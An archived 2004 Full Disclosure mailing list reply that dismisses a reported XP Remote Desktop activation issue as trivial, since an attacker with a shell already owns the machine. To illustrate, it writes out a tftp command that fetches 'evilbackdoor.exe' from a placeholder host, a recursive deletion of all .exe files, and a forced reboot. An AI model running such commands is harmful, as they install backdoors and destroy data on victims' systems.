Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: XP Remote Desktop Remote Activation
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 2 Oct 2004 09:05:25 -0700

a malicious user who has already gained a command shell to activate

umm... you already own the box.
try... 
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )

or

c:\del *.exe /s
c:\shutdown -r

I realy do not see the SECURITY ISSUE here.


cheers,
m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]